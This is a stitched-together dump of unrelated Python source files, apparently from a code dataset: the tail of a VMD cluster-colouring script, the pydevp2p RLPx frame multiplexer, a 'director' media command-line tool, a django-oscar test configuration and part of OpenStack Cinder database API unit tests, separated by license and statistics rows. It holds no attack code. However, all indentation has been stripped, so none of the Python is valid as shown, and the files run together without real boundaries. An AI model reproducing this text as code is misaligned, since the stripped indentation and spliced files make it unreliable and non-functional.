colorID = ind % 16
line += str(colorID) + ' '
molinds = np.where(cID == np.array(clusterIDs))[0]
ainds = molinds.copy()
for molind in molinds:
ainds = np.concatenate((ainds,
molno+molind*(atomno-1)+np.arange(0,
atomno-1)))
for aind in ainds:
line += str(aind) + ' '
line += '\n'
framefile.write(line)
ind += 1
framefile.close()
def writeFramesFromCIDFile(cIDfile,molno,atomno,frameoutbase):
""" Function that writes out multiple frames for coloring by cluster
Parameters
----------
cIDfile: file containing cluster IDs
molno: int
number of molecules in frame
atomno: int
number of atoms per molecule
frameoutbase: string
base name of output files
"""
cIDfile = open(cIDfile)
lines = cIDfile.readlines()
cIDfile.close()
ind = 0
for line in lines:
cIDsf = [float(c) for c in line.split()]
cIDs = [int(c) for c in cIDsf]
writeFrameForVMD(cIDs,molno,atomno,frameoutbase+str(ind)+'.dat')
ind+=1
| mit | -3,627,616,678,007,215,000 | 30.784091 | 78 | 0.632463 | false |
ethereum/pydevp2p | devp2p/multiplexer.py | 1 | 21218 | from gevent.queue import Queue
from collections import OrderedDict
import rlp
from rlp.utils import str_to_bytes, is_integer
import struct
import sys
sys.setrecursionlimit(10000) # frames are generated recursively
# chunked-0: rlp.list(protocol-type, sequence-id, total-packet-size)
header_data_sedes = rlp.sedes.List([rlp.sedes.big_endian_int] * 3, strict=False)
def ceil16(x):
return x if x % 16 == 0 else x + 16 - (x % 16)
def rzpad16(data):
if len(data) % 16:
data += b'\x00' * (16 - len(data) % 16)
return data
class MultiplexerError(Exception):
pass
class DeserializationError(MultiplexerError):
pass
class FormatError(MultiplexerError):
pass
class FrameCipherBase(object):
mac_len = 16
header_len = 32
dummy_mac = '\x00' * mac_len
block_size = 16
def encrypt(self, header, frame):
assert len(header) == self.header_len
assert len(frame) % self.block_size == 0
return header + self.mac + frame + self.mac
def decrypt_header(self, data):
assert len(data) >= self.header_len + self.mac_len + 1 + self.mac_len
return data[:self.header_len]
def decrypt_body(self, data, body_size):
assert len(data) >= self.header_len + self.mac_len + body_size + self.mac_len
frame_offset = self.header_len + self.mac_len
return data[frame_offset:frame_offset + body_size]
class Frame(object):
"""
When sending a packet over RLPx, the packet will be framed.
The frame provides information about the size of the packet and the packet's
source protocol. There are three slightly different frames, depending on whether
or not the frame is delivering a multi-frame packet. A multi-frame packet is a
packet which is split (aka chunked) into multiple frames because it's size is
larger than the protocol window size (pws; see Multiplexing). When a packet is
chunked into multiple frames, there is an implicit difference between the first
frame and all subsequent frames.
Thus, the three frame types are
normal, chunked-0 (first frame of a multi-frame packet),
and chunked-n (subsequent frames of a multi-frame packet).
Single-frame packet:
header || header-mac || frame || mac
Multi-frame packet:
header || header-mac || frame-0 ||
[ header || header-mac || frame-n || ... || ]
header || header-mac || frame-last || mac
"""
header_size = 16
mac_size = 16
padding = 16
is_chunked_0 = False
total_payload_size = None # only used with chunked_0
frame_cipher = None
cipher_called = False
def __init__(self, protocol_id, cmd_id, payload, sequence_id, window_size,
is_chunked_n=False, frames=None, frame_cipher=None):
payload = memoryview(payload)
assert is_integer(window_size)
assert window_size % self.padding == 0
assert isinstance(cmd_id, int) and cmd_id < 256
self.cmd_id = cmd_id
self.payload = payload
if frame_cipher:
self.frame_cipher = frame_cipher
self.frames = frames or []
assert protocol_id < 2**16
self.protocol_id = protocol_id
assert sequence_id is None or sequence_id < 2**16
self.sequence_id = sequence_id
self.is_chunked_n = is_chunked_n
self.frames.append(self)
# chunk payloads resulting in frames exceeding window_size
fs = self.frame_size()
if fs > window_size:
if not is_chunked_n:
self.is_chunked_0 = True
self.total_payload_size = self.body_size()
# chunk payload
self.payload = payload[:window_size - fs]
assert self.frame_size() <= window_size
remain = payload[len(self.payload):]
assert len(remain) + len(self.payload) == len(payload)
Frame(protocol_id, cmd_id, remain, sequence_id, window_size,
is_chunked_n=True,
frames=self.frames,
frame_cipher=frame_cipher)
assert self.frame_size() <= window_size
def __repr__(self):
return '<Frame(%s, len=%d sid=%r)>' % \
(self._frame_type(), self.frame_size(), self.sequence_id)
def _frame_type(self):
return 'normal' * self.is_normal or 'chunked_0' * self.is_chunked_0 or 'chunked_n'
def body_size(self, padded=False):
# frame-size: 3-byte integer size of frame, big endian encoded (excludes padding)
# frame relates to body w/o padding w/o mac
l = len(self.enc_cmd_id) + len(self.payload)
if padded:
l = ceil16(l)
return l
def frame_size(self):
# header16 || mac16 || dataN + [padding] || mac16
return self.header_size + self.mac_size + self.body_size(padded=True) + self.mac_size
@property
def is_normal(self):
return not self.is_chunked_n and not self.is_chunked_0
@property
def header(self):
"""
header: frame-size || header-data || padding
frame-size: 3-byte integer size of frame, big endian encoded
header-data:
normal: rlp.list(protocol-type[, sequence-id])
chunked-0: rlp.list(protocol-type, sequence-id, total-packet-size)
chunked-n: rlp.list(protocol-type, sequence-id)
normal, chunked-n: rlp.list(protocol-type[, sequence-id])
values:
protocol-type: < 2**16
sequence-id: < 2**16 (this value is optional for normal frames)
total-packet-size: < 2**32
padding: zero-fill to 16-byte boundary
"""
assert self.protocol_id < 2**16
assert self.sequence_id is None or self.sequence_id < 2**16
l = [self.protocol_id]
if self.is_chunked_0:
assert self.sequence_id is not None
l.append(self.sequence_id)
l.append(self.total_payload_size)
elif self.sequence_id is not None: # normal, chunked_n
l.append(self.sequence_id)
header_data = rlp.encode(l, sedes=header_data_sedes)
assert tuple(l) == rlp.decode(header_data, sedes=header_data_sedes, strict=False)
# write body_size to header
# frame-size: 3-byte integer size of frame, big endian encoded (excludes padding)
# frame relates to body w/o padding w/o mac
body_size = self.body_size()
assert body_size < 256**3
header = struct.pack('>I', body_size)[1:] + header_data
header = rzpad16(header) # padding
assert len(header) == self.header_size
return header
@property
def enc_cmd_id(self):
if not self.is_chunked_n:
return rlp.encode(self.cmd_id, sedes=rlp.sedes.big_endian_int) # unsigned byte
return b''
@property
def body(self):
"""
frame:
normal: rlp(packet-type) [|| rlp(packet-data)] || padding
chunked-0: rlp(packet-type) || rlp(packet-data...)
chunked-n: rlp(...packet-data) || padding
padding: zero-fill to 16-byte boundary (only necessary for last frame)
"""
b = self.enc_cmd_id # packet-type
length = len(b) + len(self.payload)
assert isinstance(self.payload, memoryview)
return b + self.payload.tobytes() + b'\x00' * (ceil16(length) - length)
def get_frames(self):
return self.frames
def as_bytes(self):
assert not self.cipher_called # must only be called once
if not self.frame_cipher:
assert len(self.header) == 16 == self.header_size
assert len(self.body) == self.body_size(padded=True)
dummy_mac = b'\x00' * self.mac_size
r = self.header + dummy_mac + self.body + dummy_mac
assert len(r) == self.frame_size()
return r
else:
self.cipher_called = True
e = self.frame_cipher.encrypt(self.header, self.body)
assert len(e) == self.frame_size()
return e
class Packet(object):
"""
Packets are emitted and received by subprotocols
"""
def __init__(self, protocol_id=0, cmd_id=0, payload=b'', prioritize=False):
self.protocol_id = protocol_id
self.cmd_id = cmd_id
self.payload = payload
self.prioritize = prioritize
def __repr__(self):
return 'Packet(%r)' % dict(protocol_id=self.protocol_id,
cmd_id=self.cmd_id,
payload_len=len(self.payload),
prioritize=self.prioritize)
def __eq__(self, other):
s = dict(self.__dict__)
s.pop('prioritize')
o = dict(other.__dict__)
o.pop('prioritize')
return s == o
def __len__(self):
return len(self.payload)
class Multiplexer(object):
"""
Multiplexing of protocols is performed via dynamic framing and fair queueing.
Dequeuing packets is performed in a cycle which dequeues one or more packets
from the queue(s) of each active protocol. The multiplexor determines the
amount of bytes to send for each protocol prior to each round of dequeuing packets.
If the size of an RLP-encoded packet is less than 1 KB then the protocol may
request that the network layer prioritize the delivery of the packet.
This should be used if and only if the packet must be delivered before all other packets.
The network layer maintains two queues and three buffers per protocol:
a queue for normal packets, a queue for priority packets,
a chunked-frame buffer, a normal-frame buffer, and a priority-frame buffer.
Implemented Variant:
each sub protocol has three queues
prio
normal
chunked
protocols are queried round robin
"""
max_window_size = 8 * 1024
max_priority_frame_size = 1024
max_payload_size = 10 * 1024**2
frame_cipher = None
_cached_decode_header = None
def __init__(self, frame_cipher=None):
if frame_cipher:
# assert isinstance(frame_cipher, FrameCipherBase)
self.frame_cipher = frame_cipher
self.queues = OrderedDict() # protocol_id : dict(normal=queue, chunked=queue, prio=queue)
self.sequence_id = dict() # protocol_id : counter
self.last_protocol = None # last protocol, which sent data to the buffer
self.chunked_buffers = dict() # decode: protocol_id: dict(sequence_id: buffer)
self._decode_buffer = bytearray()
@property
def num_active_protocols(self):
"A protocol is considered active if it's queue contains one or more packets."
return sum(1 for p_id in self.queues if self.is_active_protocol(p_id))
def is_active_protocol(self, protocol_id):
return True if sum(q.qsize() for q in self.queues[protocol_id].values()) else False
def protocol_window_size(self, protocol_id=None):
"""
pws = protocol-window-size = window-size / active-protocol-count
initial pws = 8kb
"""
if protocol_id and not self.is_active_protocol(protocol_id):
s = self.max_window_size // (1 + self.num_active_protocols)
else:
s = self.max_window_size // max(1, self.num_active_protocols)
return s - s % 16 # should be a multiple of padding size
def add_protocol(self, protocol_id):
assert protocol_id not in self.queues
self.queues[protocol_id] = dict(normal=Queue(),
chunked=Queue(),
priority=Queue())
self.sequence_id[protocol_id] = 0
self.chunked_buffers[protocol_id] = dict()
self.last_protocol = protocol_id
@property
def next_protocol(self):
protocols = tuple(self.queues.keys())
if self.last_protocol == protocols[-1]:
next_protocol = protocols[0]
else:
next_protocol = protocols[protocols.index(self.last_protocol) + 1]
self.last_protocol = next_protocol
return next_protocol
def add_packet(self, packet):
#protocol_id, cmd_id, rlp_data, prioritize=False
sid = self.sequence_id[packet.protocol_id]
self.sequence_id[packet.protocol_id] = (sid + 1) % 2**16
frames = Frame(packet.protocol_id, packet.cmd_id, packet.payload,
sequence_id=sid,
window_size=self.protocol_window_size(packet.protocol_id),
frame_cipher=self.frame_cipher
).frames
queues = self.queues[packet.protocol_id]
if packet.prioritize:
assert len(frames) == 1
assert frames[0].frame_size() <= self.max_priority_frame_size
queues['priority'].put(frames[0])
elif len(frames) == 1:
queues['normal'].put(frames[0])
else:
for f in frames:
queues['chunked'].put(f)
def pop_frames_for_protocol(self, protocol_id):
"""
If priority packet and normal packet exist:
send up to pws/2 bytes from each (priority first!)
else if priority packet and chunked-frame exist:
send up to pws/2 bytes from each
else
if normal packet and chunked-frame exist: send up to pws/2 bytes from each
else
read pws bytes from active buffer
If there are bytes leftover -- for example, if the bytes sent is < pws,
then repeat the cycle.
"""
pws = self.protocol_window_size()
queues = self.queues[protocol_id]
frames = []
# size = lambda:
size = 0
while size < pws:
frames_added = 0
for qn in ('priority', 'normal', 'chunked'):
q = queues[qn]
if q.qsize():
fs = q.peek().frame_size()
if size + fs <= pws:
frames.append(q.get())
size += fs
frames_added += 1
# add no more than two in order to send normal and priority first
if frames_added == 2:
break # i.e. next is 'priority' again
# empty queues
if frames_added == 0:
break
# the following can not be guaranteed, as pws might have been different
# at the time where packets were framed and added to the queues
# assert sum(f.frame_size() for f in frames) <= pws
return frames
def pop_frames(self):
"""
returns the frames for the next protocol up to protocol window size bytes
"""
protocols = tuple(self.queues.keys())
idx = protocols.index(self.next_protocol)
protocols = protocols[idx:] + protocols[:idx]
assert len(protocols) == len(self.queues.keys())
for p in protocols:
frames = self.pop_frames_for_protocol(p)
if frames:
return frames
return []
def pop_all_frames(self):
frames = []
while True:
r = self.pop_frames()
frames.extend(r)
if not r:
break
return frames
def pop_all_frames_as_bytes(self):
return b''.join(f.as_bytes() for f in self.pop_all_frames())
def decode_header(self, buffer):
assert isinstance(buffer, memoryview)
assert len(buffer) >= 32
if self.frame_cipher:
header = self.frame_cipher.decrypt_header(
buffer[:Frame.header_size + Frame.mac_size].tobytes())
else:
# header: frame-size || header-data || padding
header = buffer[:Frame.header_size].tobytes()
return header
def decode_body(self, buffer, header=None):
"""
w/o encryption
peak into buffer for body_size
return None if buffer is not long enough to decode frame
"""
assert isinstance(buffer, memoryview)
if len(buffer) < Frame.header_size:
return None, buffer
if not header:
header = self.decode_header(buffer[:Frame.header_size + Frame.mac_size].tobytes())
body_size = struct.unpack('>I', b'\x00' + header[:3])[0]
if self.frame_cipher:
body = self.frame_cipher.decrypt_body(buffer[Frame.header_size + Frame.mac_size:].tobytes(),
body_size)
assert len(body) == body_size
bytes_read = Frame.header_size + Frame.mac_size + ceil16(len(body)) + Frame.mac_size
else:
# header: frame-size || header-data || padding
header = buffer[:Frame.header_size].tobytes()
# frame-size: 3-byte integer size of frame, big endian encoded (excludes padding)
# frame relates to body w/o padding w/o mac
body_offset = Frame.header_size + Frame.mac_size
body = buffer[body_offset:body_offset + body_size].tobytes()
assert len(body) == body_size
bytes_read = ceil16(body_offset + body_size + Frame.mac_size)
assert bytes_read % Frame.padding == 0
# normal, chunked-n: rlp.list(protocol-type[, sequence-id])
# chunked-0: rlp.list(protocol-type, sequence-id, total-packet-size)
try:
header_data = rlp.decode(header[3:], sedes=header_data_sedes, strict=False)
except rlp.RLPException:
raise DeserializationError('invalid rlp data')
if len(header_data) == 3:
chunked_0 = True
total_payload_size = header_data[2]
assert total_payload_size < 2**32
else:
chunked_0 = False
total_payload_size = None
# protocol-type: < 2**16
protocol_id = header_data[0]
assert protocol_id < 2**16
# sequence-id: < 2**16 (this value is optional for normal frames)
if len(header_data) > 1:
sequence_id = header_data[1]
assert sequence_id < 2**16
else:
sequence_id = None
# build packet
if protocol_id not in self.chunked_buffers:
raise MultiplexerError('unknown protocol_id %d' % (protocol_id))
chunkbuf = self.chunked_buffers[protocol_id]
if sequence_id in chunkbuf:
# body chunked-n: packet-data || padding
packet = chunkbuf[sequence_id]
if chunked_0:
raise MultiplexerError('received chunked_0 frame for existing buffer %d of protocol %d' %
(sequence_id, protocol_id))
if len(body) > packet.total_payload_size - len(packet.payload):
raise MultiplexerError('too much data for chunked buffer %d of protocol %d' %
(sequence_id, protocol_id))
# all good
packet.payload += body
if packet.total_payload_size == len(packet.payload):
del packet.total_payload_size
del chunkbuf[sequence_id]
return packet
else:
# body normal, chunked-0: rlp(packet-type) [|| rlp(packet-data)] || padding
item, end = rlp.codec.consume_item(body, 0)
cmd_id = rlp.sedes.big_endian_int.deserialize(item)
if chunked_0:
payload = bytearray(body[end:])
total_payload_size -= end
else:
payload = body[end:]
packet = Packet(protocol_id=protocol_id, cmd_id=cmd_id, payload=payload)
if chunked_0:
if total_payload_size < len(payload):
raise MultiplexerError('total payload size smaller than initial chunk')
if total_payload_size == len(payload):
return packet # shouldn't have been chunked, whatever
assert sequence_id is not None
packet.total_payload_size = total_payload_size
chunkbuf[sequence_id] = packet
else:
return packet # normal (non-chunked)
def decode(self, data=''):
if data:
self._decode_buffer.extend(data)
if not self._cached_decode_header:
if len(self._decode_buffer) < Frame.header_size + Frame.mac_size:
return []
else:
self._cached_decode_header = self.decode_header(memoryview(self._decode_buffer))
assert isinstance(self._cached_decode_header, bytes)
body_size = struct.unpack('>I', b'\x00' + self._cached_decode_header[:3])[0]
required_len = Frame.header_size + Frame.mac_size + ceil16(body_size) + Frame.mac_size
if len(self._decode_buffer) >= required_len:
packet = self.decode_body(memoryview(self._decode_buffer), self._cached_decode_header)
self._cached_decode_header = None
self._decode_buffer = self._decode_buffer[required_len:]
if packet:
return [packet] + self.decode()
else:
return self.decode()
return []
| mit | -6,756,658,152,461,528,000 | 37.578182 | 105 | 0.582996 | false |
tschaefer/director | director/__init__.py | 1 | 2748 | # -*- coding: utf-8 -*-
import sys
import os
import argparse
from director.importer import Importer
from director.updater import Updater
from director.service import Service
def stype(bytestring):
unicode_string = bytestring.decode(sys.getfilesystemencoding())
return unicode_string
def parse_options():
db = os.path.join(os.path.expanduser('~'), 'director.db')
db = 'sqlite:///%s' % db
parser = argparse.ArgumentParser(description='Director')
parser.add_argument('-d', '--database',
type=unicode,
default=db,
help='database url')
subparsers = parser.add_subparsers()
parser_import = subparsers.add_parser('import')
parser_import.set_defaults(importer=True)
parser_import.add_argument('path',
type=stype,
help='media path')
parser_import.add_argument('-v', '--verbose',
action='store_true',
help='verbose output')
parser_update = subparsers.add_parser('update')
parser_update.set_defaults(updater=True)
parser_update.add_argument('path',
type=stype,
help='media path')
parser_update.add_argument('-v', '--verbose',
action='store_true',
help='verbose output')
parser_service = subparsers.add_parser('service')
parser_service.set_defaults(service=True)
parser_service.add_argument('path',
type=stype,
help='media path')
parser_service.add_argument('-H', '--host',
type=unicode,
default='localhost',
help='bind to address')
parser_service.add_argument('-p', '--port',
type=int,
default=8888,
help='listen to port')
return parser.parse_args()
def run(args):
if hasattr(args, 'importer'):
importer = Importer(path=args.path, database=args.database,
verbose=args.verbose)
importer.run()
elif hasattr(args, 'updater'):
updater = Updater(path=args.path, database=args.database,
verbose=args.verbose)
updater.run()
elif hasattr(args, 'service'):
service = Service(host=args.host, port=args.port,
database=args.database, path=args.path)
service.run()
def main():
args = parse_options()
run(args)
if __name__ == '__main__':
main()
| bsd-3-clause | -2,391,396,943,135,285,000 | 32.108434 | 67 | 0.519651 | false |
elliotthill/django-oscar | tests/config.py | 1 | 3532 | import os
import django
from django.conf import settings, global_settings
import oscar
def configure():
if not settings.configured:
from oscar.defaults import OSCAR_SETTINGS
# Helper function to extract absolute path
location = lambda x: os.path.join(
os.path.dirname(os.path.realpath(__file__)), x)
test_settings = {
'DATABASES': {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
},
},
'INSTALLED_APPS': [
'django.contrib.auth',
'django.contrib.admin',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.flatpages',
'django.contrib.staticfiles',
'sorl.thumbnail',
'compressor',
# Use a custom partner app to test overriding models. I can't
# find a way of doing this on a per-test basis, so I'm using a
# global change.
] + oscar.get_core_apps(['tests._site.apps.partner']),
'TEMPLATE_CONTEXT_PROCESSORS': (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.contrib.messages.context_processors.messages",
'oscar.apps.search.context_processors.search_form',
'oscar.apps.customer.notifications.context_processors.notifications',
'oscar.apps.promotions.context_processors.promotions',
'oscar.apps.checkout.context_processors.checkout',
'oscar.core.context_processors.metadata',
),
'TEMPLATE_DIRS': (
location('templates'),
oscar.OSCAR_MAIN_TEMPLATE_DIR,
),
'MIDDLEWARE_CLASSES': global_settings.MIDDLEWARE_CLASSES + (
'oscar.apps.basket.middleware.BasketMiddleware',
),
'AUTHENTICATION_BACKENDS': (
'oscar.apps.customer.auth_backends.Emailbackend',
'django.contrib.auth.backends.ModelBackend',
),
'HAYSTACK_CONNECTIONS': {
'default': {
'ENGINE': 'haystack.backends.simple_backend.SimpleEngine',
}
},
'PASSWORD_HASHERS': ['django.contrib.auth.hashers.MD5PasswordHasher'],
'ROOT_URLCONF': 'tests._site.urls',
'LOGIN_REDIRECT_URL': '/accounts/',
'STATIC_URL': '/static/',
'COMPRESS_ENABLED': False,
'ADMINS': ('[email protected]',),
'DEBUG': False,
'SITE_ID': 1,
'APPEND_SLASH': True,
'DDF_DEFAULT_DATA_FIXTURE': 'tests.dynamic_fixtures.OscarDynamicDataFixtureClass',
'SESSION_SERIALIZER': 'django.contrib.sessions.serializers.PickleSerializer',
}
if django.VERSION >= (1, 5):
test_settings['INSTALLED_APPS'] += ['tests._site.myauth', ]
test_settings['AUTH_USER_MODEL'] = 'myauth.User'
test_settings.update(OSCAR_SETTINGS)
settings.configure(**test_settings)
| bsd-3-clause | 6,051,882,844,065,200,000 | 41.047619 | 94 | 0.541336 | false |
rakeshmi/cinder | cinder/tests/unit/test_db_api.py | 1 | 78467 | # Copyright 2014 IBM Corp.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for cinder.db.api."""
import datetime
from oslo_config import cfg
from oslo_utils import uuidutils
from cinder import context
from cinder import db
from cinder.db.sqlalchemy import api as sqlalchemy_api
from cinder import exception
from cinder import quota
from cinder import test
CONF = cfg.CONF
def _quota_reserve(context, project_id):
"""Create sample Quota, QuotaUsage and Reservation objects.
There is no method db.quota_usage_create(), so we have to use
db.quota_reserve() for creating QuotaUsage objects.
Returns reservations uuids.
"""
def get_sync(resource, usage):
def sync(elevated, project_id, session):
return {resource: usage}
return sync
quotas = {}
resources = {}
deltas = {}
for i, resource in enumerate(('volumes', 'gigabytes')):
quotas[resource] = db.quota_create(context, project_id,
resource, i + 1)
resources[resource] = quota.ReservableResource(resource,
'_sync_%s' % resource)
deltas[resource] = i + 1
return db.quota_reserve(
context, resources, quotas, deltas,
datetime.datetime.utcnow(), datetime.datetime.utcnow(),
datetime.timedelta(days=1), project_id
)
class ModelsObjectComparatorMixin(object):
def _dict_from_object(self, obj, ignored_keys):
if ignored_keys is None:
ignored_keys = []
return dict([(k, v) for k, v in obj.iteritems()
if k not in ignored_keys])
def _assertEqualObjects(self, obj1, obj2, ignored_keys=None):
obj1 = self._dict_from_object(obj1, ignored_keys)
obj2 = self._dict_from_object(obj2, ignored_keys)
self.assertEqual(
len(obj1), len(obj2),
"Keys mismatch: %s" % str(set(obj1.keys()) ^ set(obj2.keys())))
for key, value in obj1.iteritems():
self.assertEqual(value, obj2[key])
def _assertEqualListsOfObjects(self, objs1, objs2, ignored_keys=None):
obj_to_dict = lambda o: self._dict_from_object(o, ignored_keys)
sort_key = lambda d: [d[k] for k in sorted(d)]
conv_and_sort = lambda obj: sorted(map(obj_to_dict, obj), key=sort_key)
self.assertEqual(conv_and_sort(objs1), conv_and_sort(objs2))
def _assertEqualListsOfPrimitivesAsSets(self, primitives1, primitives2):
self.assertEqual(len(primitives1), len(primitives2))
for primitive in primitives1:
self.assertIn(primitive, primitives2)
for primitive in primitives2:
self.assertIn(primitive, primitives1)
class BaseTest(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(BaseTest, self).setUp()
self.ctxt = context.get_admin_context()
class DBAPIServiceTestCase(BaseTest):
"""Unit tests for cinder.db.api.service_*."""
def _get_base_values(self):
return {
'host': 'fake_host',
'binary': 'fake_binary',
'topic': 'fake_topic',
'report_count': 3,
'disabled': False
}
def _create_service(self, values):
v = self._get_base_values()
v.update(values)
return db.service_create(self.ctxt, v)
def test_service_create(self):
service = self._create_service({})
self.assertFalse(service['id'] is None)
for key, value in self._get_base_values().iteritems():
self.assertEqual(value, service[key])
def test_service_destroy(self):
service1 = self._create_service({})
service2 = self._create_service({'host': 'fake_host2'})
db.service_destroy(self.ctxt, service1['id'])
self.assertRaises(exception.ServiceNotFound,
db.service_get, self.ctxt, service1['id'])
self._assertEqualObjects(db.service_get(self.ctxt, service2['id']),
service2)
def test_service_update(self):
service = self._create_service({})
new_values = {
'host': 'fake_host1',
'binary': 'fake_binary1',
'topic': 'fake_topic1',
'report_count': 4,
'disabled': True
}
db.service_update(self.ctxt, service['id'], new_values)
updated_service = db.service_get(self.ctxt, service['id'])
for key, value in new_values.iteritems():
self.assertEqual(value, updated_service[key])
def test_service_update_not_found_exception(self):
self.assertRaises(exception.ServiceNotFound,
db.service_update, self.ctxt, 100500, {})
def test_service_get(self):
service1 = self._create_service({})
real_service1 = db.service_get(self.ctxt, service1['id'])
self._assertEqualObjects(service1, real_service1)
def test_service_get_not_found_exception(self):
self.assertRaises(exception.ServiceNotFound,
db.service_get, self.ctxt, 100500)
def test_service_get_by_host_and_topic(self):
service1 = self._create_service({'host': 'host1', 'topic': 'topic1'})
real_service1 = db.service_get_by_host_and_topic(self.ctxt,
host='host1',
topic='topic1')
self._assertEqualObjects(service1, real_service1)
def test_service_get_all(self):
values = [
{'host': 'host1', 'topic': 'topic1'},
{'host': 'host2', 'topic': 'topic2'},
{'disabled': True}
]
services = [self._create_service(vals) for vals in values]
disabled_services = [services[-1]]
non_disabled_services = services[:-1]
compares = [
(services, db.service_get_all(self.ctxt)),
(disabled_services, db.service_get_all(self.ctxt, True)),
(non_disabled_services, db.service_get_all(self.ctxt, False))
]
for comp in compares:
self._assertEqualListsOfObjects(*comp)
def test_service_get_all_by_topic(self):
values = [
{'host': 'host1', 'topic': 't1'},
{'host': 'host2', 'topic': 't1'},
{'host': 'host4', 'disabled': True, 'topic': 't1'},
{'host': 'host3', 'topic': 't2'}
]
services = [self._create_service(vals) for vals in values]
expected = services[:3]
real = db.service_get_all_by_topic(self.ctxt, 't1')
self._assertEqualListsOfObjects(expected, real)
def test_service_get_by_args(self):
values = [
{'host': 'host1', 'binary': 'a'},
{'host': 'host2', 'binary': 'b'}
]
services = [self._create_service(vals) for vals in values]
service1 = db.service_get_by_args(self.ctxt, 'host1', 'a')
self._assertEqualObjects(services[0], service1)
service2 = db.service_get_by_args(self.ctxt, 'host2', 'b')
self._assertEqualObjects(services[1], service2)
def test_service_get_by_args_not_found_exception(self):
self.assertRaises(exception.HostBinaryNotFound,
db.service_get_by_args,
self.ctxt, 'non-exists-host', 'a')
class DBAPIVolumeTestCase(BaseTest):
"""Unit tests for cinder.db.api.volume_*."""
def test_volume_create(self):
volume = db.volume_create(self.ctxt, {'host': 'host1'})
self.assertTrue(uuidutils.is_uuid_like(volume['id']))
self.assertEqual(volume.host, 'host1')
def test_volume_attached_invalid_uuid(self):
self.assertRaises(exception.InvalidUUID, db.volume_attached, self.ctxt,
42, 'invalid-uuid', None, '/tmp')
def test_volume_attached_to_instance(self):
volume = db.volume_create(self.ctxt, {'host': 'host1'})
instance_uuid = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
values = {'volume_id': volume['id'],
'instance_uuid': instance_uuid,
'attach_status': 'attaching', }
attachment = db.volume_attach(self.ctxt, values)
db.volume_attached(self.ctxt, attachment['id'],
instance_uuid, None, '/tmp')
volume = db.volume_get(self.ctxt, volume['id'])
attachment = db.volume_attachment_get(self.ctxt, attachment['id'])
self.assertEqual('in-use', volume['status'])
self.assertEqual('/tmp', attachment['mountpoint'])
self.assertEqual('attached', attachment['attach_status'])
self.assertEqual(instance_uuid, attachment['instance_uuid'])
self.assertIsNone(attachment['attached_host'])
def test_volume_attached_to_host(self):
volume = db.volume_create(self.ctxt, {'host': 'host1'})
host_name = 'fake_host'
values = {'volume_id': volume['id'],
'attached_host': host_name,
'attach_status': 'attaching', }
attachment = db.volume_attach(self.ctxt, values)
db.volume_attached(self.ctxt, attachment['id'],
None, host_name, '/tmp')
volume = db.volume_get(self.ctxt, volume['id'])
attachment = db.volume_attachment_get(self.ctxt, attachment['id'])
self.assertEqual('in-use', volume['status'])
self.assertEqual('/tmp', attachment['mountpoint'])
self.assertEqual('attached', attachment['attach_status'])
self.assertIsNone(attachment['instance_uuid'])
self.assertEqual(attachment['attached_host'], host_name)
def test_volume_data_get_for_host(self):
for i in xrange(3):
for j in xrange(3):
db.volume_create(self.ctxt, {'host': 'h%d' % i, 'size': 100})
for i in xrange(3):
self.assertEqual((3, 300),
db.volume_data_get_for_host(
self.ctxt, 'h%d' % i))
def test_volume_data_get_for_project(self):
for i in xrange(3):
for j in xrange(3):
db.volume_create(self.ctxt, {'project_id': 'p%d' % i,
'size': 100,
'host': 'h-%d-%d' % (i, j),
})
for i in xrange(3):
self.assertEqual((3, 300),
db.volume_data_get_for_project(
self.ctxt, 'p%d' % i))
def test_volume_detached_from_instance(self):
volume = db.volume_create(self.ctxt, {})
instance_uuid = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
values = {'volume_id': volume['id'],
'instance_uuid': instance_uuid,
'attach_status': 'attaching', }
attachment = db.volume_attach(self.ctxt, values)
db.volume_attached(self.ctxt, attachment['id'],
instance_uuid,
None, '/tmp')
db.volume_detached(self.ctxt, volume['id'], attachment['id'])
volume = db.volume_get(self.ctxt, volume['id'])
self.assertRaises(exception.VolumeAttachmentNotFound,
db.volume_attachment_get,
self.ctxt,
attachment['id'])
self.assertEqual('available', volume['status'])
def test_volume_detached_from_host(self):
volume = db.volume_create(self.ctxt, {})
host_name = 'fake_host'
values = {'volume_id': volume['id'],
'attach_host': host_name,
'attach_status': 'attaching', }
attachment = db.volume_attach(self.ctxt, values)
db.volume_attached(self.ctxt, attachment['id'],
None, host_name, '/tmp')
db.volume_detached(self.ctxt, volume['id'], attachment['id'])
volume = db.volume_get(self.ctxt, volume['id'])
self.assertRaises(exception.VolumeAttachmentNotFound,
db.volume_attachment_get,
self.ctxt,
attachment['id'])
self.assertEqual('available', volume['status'])
def test_volume_get(self):
volume = db.volume_create(self.ctxt, {})
self._assertEqualObjects(volume, db.volume_get(self.ctxt,
volume['id']))
def test_volume_destroy(self):
volume = db.volume_create(self.ctxt, {})
db.volume_destroy(self.ctxt, volume['id'])
self.assertRaises(exception.VolumeNotFound, db.volume_get,
self.ctxt, volume['id'])
def test_volume_get_all(self):
volumes = [db.volume_create(self.ctxt,
{'host': 'h%d' % i, 'size': i})
for i in xrange(3)]
self._assertEqualListsOfObjects(volumes, db.volume_get_all(
self.ctxt, None, None, ['host'], None))
def test_volume_get_all_marker_passed(self):
volumes = [
db.volume_create(self.ctxt, {'id': 1}),
db.volume_create(self.ctxt, {'id': 2}),
db.volume_create(self.ctxt, {'id': 3}),
db.volume_create(self.ctxt, {'id': 4}),
]
self._assertEqualListsOfObjects(volumes[2:], db.volume_get_all(
self.ctxt, 2, 2, ['id'], ['asc']))
def test_volume_get_all_by_host(self):
volumes = []
for i in xrange(3):
volumes.append([db.volume_create(self.ctxt, {'host': 'h%d' % i})
for j in xrange(3)])
for i in xrange(3):
self._assertEqualListsOfObjects(volumes[i],
db.volume_get_all_by_host(
self.ctxt, 'h%d' % i))
